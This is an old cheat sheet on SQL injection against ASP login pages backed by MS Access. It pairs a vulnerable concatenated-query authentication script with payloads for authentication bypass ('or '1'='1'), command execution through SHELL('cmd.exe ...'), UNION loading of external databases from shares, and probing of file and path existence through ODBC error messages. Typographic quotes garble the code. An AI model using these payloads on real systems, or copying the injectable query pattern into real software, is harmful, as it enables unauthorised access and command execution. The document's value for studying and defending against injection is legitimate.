================================================== ==========================
% Access SQL Injection
% brett.moore_at_security-assessment.com
================================================== ==========================
Nothing new here, move along..
************************************************** **************************
% MS Access system tables
************************************************** **************************
************************************************** **************************
% MS Access command execution, (older versions only)
************************************************** **************************
[Auth Page Script]
user = request(„user“)
pass = request(„pass“)
Set Conn = Server.CreateObject(„ADODB.Connection“)
Set Rs = Server.CreateObject(„ADODB.Recordset“)
Conn.Open dsn
SQL = „SELECT * FROM users where pass='“& pass &“‚ and user='“& user & „‚“
rs.open sql,conn
if rs.eof and rs.bof then
‚ Access Denied
‚ Access Allowed
end if
[Auth Page Bypass]
user = |SHELL(„cmd.exe /c dir > c:\test.txt“)|
pass = test
************************************************** **************************
% Auth Bypass, Basic
************************************************** **************************
[Auth Page Script]
user = request(„user“)
pass = request(„pass“)
Set Conn = Server.CreateObject(„ADODB.Connection“)
Set Rs = Server.CreateObject(„ADODB.Recordset“)
Conn.Open dsn
SQL = „SELECT * FROM users where pass='“& pass &“‚ and user='“& user & „‚“
rs.open sql,conn
if rs.eof and rs.bof then
‚ Access Denied
‚ Access Allowed
end if
[Auth Page Bypass]
user = ‚ or ‚1‘=’1
pass = test
************************************************** **************************
% Auth Bypass, Simple
************************************************** **************************
[Auth Page Script]
user = request(„user“)
pass = request(„pass“)
Set Conn = Server.CreateObject(„ADODB.Connection“)
Set Rs = Server.CreateObject(„ADODB.Recordset“)
Conn.Open dsn
SQL = „SELECT user,pass FROM users where user='“& user & „‚“
rs.open sql,conn
if rs.eof and rs.bof then
‚ Access Denied
if (rs(„pass“) = pass) then
‚ Access Allowed
‚ Access Denied
end if
end if
[Auth Page Bypass Using Shares]
user = ‚ union select name,password from table1 in ‚\\share\test\test.mdb
pass = password that is set in \\share\test\test.mdb
[Auth Page Bypass Local mdbs]
user = ‚ union select ‚0test‘,’0test‘ from customers in
‚C:\winnt\Help\iisHelp\iis\htm\tutorial\eecustmr.m db‘
pass = 0test
[Union Notes]
Remeber when using unions the sort order can affect the first record
************************************************** **************************
% System Path Disclosure
************************************************** **************************
[Sql String]
user = test‘ union select names from msysobjects in ‚.
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine
open the file ‚C:\WINNT\system32′. It is already opened exclusively by
another user,
or you need permission to view its data.
************************************************** **************************
% Verify File Exists
************************************************** **************************
[Sql String – non-existant file]
user = test‘ union select name from msysobjects in ‚\proof
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] Could not find file ‚C:\proof‘.
[Sql String – existant]
user = test‘ union select name from msysobjects in ‚\proof.txt
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] Unrecognized database format
************************************************** **************************
% Verify Path Exists
************************************************** **************************
[Sql String – non-existant path]
test‘ union select name from msysobjects in ‚\nopath\sqlerr
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] ‚C:\nopath\sqlerr‘ is not a valid
Make sure that the path name is spelled correctly and that you are
connected to the
server on which the file resides.
[Sql String – existant path]
user = test‘ union select name from msysobjects in ‚\inetpub\sqlerr
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] Could not find file